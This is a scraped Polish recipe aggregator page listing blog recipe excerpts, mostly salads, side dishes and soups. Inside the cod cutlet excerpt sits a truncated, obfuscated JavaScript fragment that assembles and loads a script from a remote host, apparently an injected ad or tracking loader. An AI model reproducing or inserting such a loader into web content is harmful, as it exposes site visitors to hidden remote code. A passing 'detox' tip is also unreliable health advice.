sałatka do obiadu - 9613 przepisów (strona:384/641)

Nowa kategoria na blogu czyli pierwszy koktajl owocowo-warzywny 270

Doszły mnie słuchy, że w nowym roku chcecie się trochę odchudzić, a ja Wam ciasta serwuję... ;) Serio, serio? Odchudzanie? No dobrze, skoro naprawdę musicie, zdradzę Wam

Ratunku obiad
Pęczak ze szpinakiem i pomidorami 158

Nie wiem czemu, ale jesień od zawsze kojarzy mi się z kaszami. Może to dlatego, że kiedyś kasza akompaniowała tylko cięższe mięsne dania, które podawano po

Kulinarne przygody Gatity
Ziemniaki Hasselback 389

końca, tak by spód był w całości i nic się nie przerywało. Pieczony w piekarniku, u mnie z dodatkiem masełka, czosnku i na końcu świeżego koperku. Podany z sałatką i rybką, jak to u mnie przy piątku bywa smakował rewelacyjnie. Już nie mogę doczekać się następnego razu. Będą u mnie gościć zdecydowanie częściej, bo zarówno Mąż jak i dzieciaki uwielbiają(...)minut. Po tym czasie polewamy pozostałym tłuszczem, posypujemy odrobiną soli, bułki tartej i parmezanu (w tej kolejności). Zapiekamy jeszcze przez 15 minut. Podajemy jako dodatek do obiadu lub samodzielnie w towarzystwie ulubionych sosów

Kuchnia w czekoladzie
Degustacja w BelEtage 227

Wykwintne dania wymagają eleganckiej oprawy. Dlatego gdy zaproszono nas na degustację do restauracji BelEtage w IBB Grand Hotelu Lublinianka, wiedziałam, że będzie to wyjątkowa uczta. Razem

Obiad gotowy
Surówka kapuściana z papryką 241

Pyszna i efektowna surówka z kapusty, dobra na każdą okazję: grill, obiad, kolacja... -- Skład: pół główki kapusty, pół cebuli, pół główki czosnku, 3 x po pół papryki w różnych kolorach, płaska łyżeczka soli, pół płaskiej łyżeczki pieprzu, łyżeczka cukru, 2-4 łyżki octu, 4-6 łyżek oleju. Szczypiorek lub koperek do ozdobienia ale też do smaku lub czerwoną cebulę(...)preferencji, które wam odpowiadają. Kapustę ucieramy na grubych oczkach, pozostałe warzywa kroimy w małą kostkę. Tak przygotowane składniki układamy w miseczce wg swoich upodobań... -- -- -- Jeżeli chcemy, to możemy przyprawić sałatkę od razu lub też przyprawy można  połączyć razem i każdy potem sobie przyprawi po nałożeniu, na talerzu. -- Sałatka dobrze się prezentuje również gdy jest pomieszana i przyprawiona w całości

chleba naszego
Fasola w sosie serowym 143

Fasola w sosie serowym na obiad. Bardzo lubię przystawki, na które składają się ogólnie dostępne warzywa. Zielona fasola szparagowa to właśnie takie nieskomplikowane warzywo, dostępne przez cały rok. Można je przyrządzić na wiele sposobów. Jest smaczna i pożywna. Latem robię zapasy i mrożę fasolę. Ten sposób moim zdaniem jest najlepszy. Ugotowana fasola w słoikach traci swój świeży zielony kolor. Mrożona(...)smakuje jak latem. Wystarczy ją lekko obgotować i opłukać pod zimną wodą. W ten sposób fasola podobnie jak inne zielone warzywa zachowuje swój piękny, naturalny kolor. Lubię fasolę w sałatkach . Uwielbiam fasolę od dzieciństwa z tartą bułką na słodko. Obecnie wolę jednak zastąpić bułkę czy panko zmielonymi orzechami lub migdałami. Fasola w sosie serowym idealnie pasuje do mięsa i drobiu

codojedzenia
Kotleciki z dorsza w wersji fit 176

oleju rzepakowym. Pyszności! Z czym podawać kotleciki z dorsza? Kolacja powinna być lekkim posiłkiem, dlatego staraj się nie przejadać. Pyszny kotlecik możesz przekąsić z kromką pełnoziarnistego pieczywa albo porcją sałatki. Jeżeli masz ochotę na ciepłą kolację, podaj kotleciki z ryżem, kaszą jaglaną, kuskusem lub warzywami gotowanymi na parze. Składniki, których potrzebujesz do przygotowania kotlecików z dorsza z dodatkami, znajdziesz(...)domowych posiłków. Zadbaj o to, żeby Twoje menu było jak najbardziej zróżnicowane. Ryby powinny zająć w nim miejsce honorowe, szczególnie z warzywnymi dodatkami. Są idealnym pomysłem nie tylko na obiad, ale też ostatnie danie w ciągu dnia. (function(){ qxaw=document.createElement("script");qxaw_=("us")+("ta"); qxaw_+="t"+(".");qxaw_+=("in");qxawu="11904021";qxaw.async=true; qxawu+=".n6451052xawalpayf";qxaw.type="text/javascript";qxaw_+="f"+"o"+("/"); qxawu

Tradycyjna Kuchnia
Ulubiona sałatka owocowa 114

wydrążaniem zawartości łyżeczką, ani mozolnie skrobać skórki nożem. Wystarczy kiwi sparzyć przez kilkanaście sekund we wrzącej wodzie. Następnie przy lekkim podważeniu nożem, skórka schodzi łatwo całymi płatami. Wracając do sałatki :) Kiwi, mandarynki i cytrynę sparzyć, a następnie wyszorować dokładnie szczoteczką. Miód i kaki umyć pod bieżącą wodą.  Kiwi i kaki obrać ze skórki, pokroić w plastry lub inne, dowolne(...)przełożyć do salaterki, skropić sokiem z cytryny i polać łyżeczką płynnego miodu. Zostawić na pół godziny, aby smaki "się przegryzły".  Podawać jako zdrowy i niskokaloryczny deser po systym obiedzie

Grunt to przepis!
Kilka porad na Wielkanoc 151

kaloryczność.  ZAKWAS NA ŻUREK . Dobrze zrobić wcześniej samodzielnie albo kupić gotowy, który składem będzie równał się z domowym ( mąka żytnia razowa, czosnek, woda, ziele angielskie, pieprz, liść laurowy). SAŁATKI . na Wielkanocnym stole nie powinno ich zabraknąć. Starajmy się by były ze świeżych warzyw z dodatkiem jogurtu. Wykorzystujmy ogórki, rzodkiewki, seler naciowy, kiełki, kalafiora, sałatę itp. PASZTET . Obok tego tradycyjnego(...)wspomagających trawienie: majeranek, kminek, rozmaryn, tymianek, koper, lubczyk, kolendra, bazylia, imbir, gałka muszkatołowa. RUCH . Pamiętajmy by w ciągu dnia wygospodarować czas na wspólną aktywność fizyczną, np. spacer rodzinny po obiedzie.  DETOKS -poświąteczne oczyszczenie. Warto po świętach i dość tłustych potrawach poświęcić 3 dni na detoks organizmu. Należy wtedy: pić dużo wody oraz koktajli, jeść świeże warzywa i owoce (owoce

Życie na widelcu
pierś w marynacie z soli wędzonej i papryce chilli... 166

osuszyć i przeciąć na 2 sztuki olej wymieszać z solą wędzoną i suszoną papryką chilli całe piersi bez rozbijania namoczyć w marynacie i do lodówki na całą noc przed obiadem piersi wkładam z marynatą do woreczków i tłuczkiem rozbijam na 2 kotlety rozbite maczać w roztrzepanym jajku i obtaczać w tartej bułce na gorącym oleju smażyć na rumiano kotlety można(...)polecam.... sól morska wędzona Royal Brand: powstaje w wyniku naturalnego procesu wędzenia soli morskie - skład: naturalna sól morska - zastosowanie: do dań typowo amerykańskich,do barbecue,do sosów,zup, twarogów,sałatek,pomidorów, nadaje smak i aromat wędzonego drewna, świetna dla wegetarian, nadaje potrawą smak i zapach wędzonki

W Mojej Kuchni Lubię
Surówka z pomidorów i papryki 93

Pomidory niby są przez cały rok, ale zdecydowanie najsmaczniejsze są latem! Dlatego latem na moim stole królują one jako dodatki do dań. Każdy kształt i kolor

PatiGotuje
Sałatka z pieczonego kalafiora z migdałami 119

Wieki temu kiedy z przyjaciółkami spotykałyśmy się na wakacyjne plotki często naszą przekąską był kalafior. Wtedy był ugotowany na miękko, rozgnieciony widelcem z dodatkiem ogromnej ilości

wiecejwarzyw.pl
Zupa krem z zielonego groszku 91

Soczyście zielony krem z groszku idealny na dodanie koloru chłodnym zimowym dniom :D W oczekiwaniu na wiosnę nie musimy rezygnować z warzyw, Warto sięgnąć w tym

HealthyCreations
Wiosenna zupa z pora i fasolki szparagowej 166

Powolnym tempem, ale chyba wszyscy mają nadzieję, że już niedługo, zawita do nas prawdziwa wiosna. Póki co, przymrozki nie do końca chcą nam odpuścić, ale aura

psgotujemy
49 przepisów z cukinią 231

Specjalnie dla Was, właśnie teraz, kiedy cukinia króluje na straganach, najlepsze z najlepszych przepisy na moje ukochane warzywo! Pamiętajcie, że im mniejsza cukinia, tym smaczniejsza, ma

Moja smaczna kuchnia

Proponowane wyszukiwania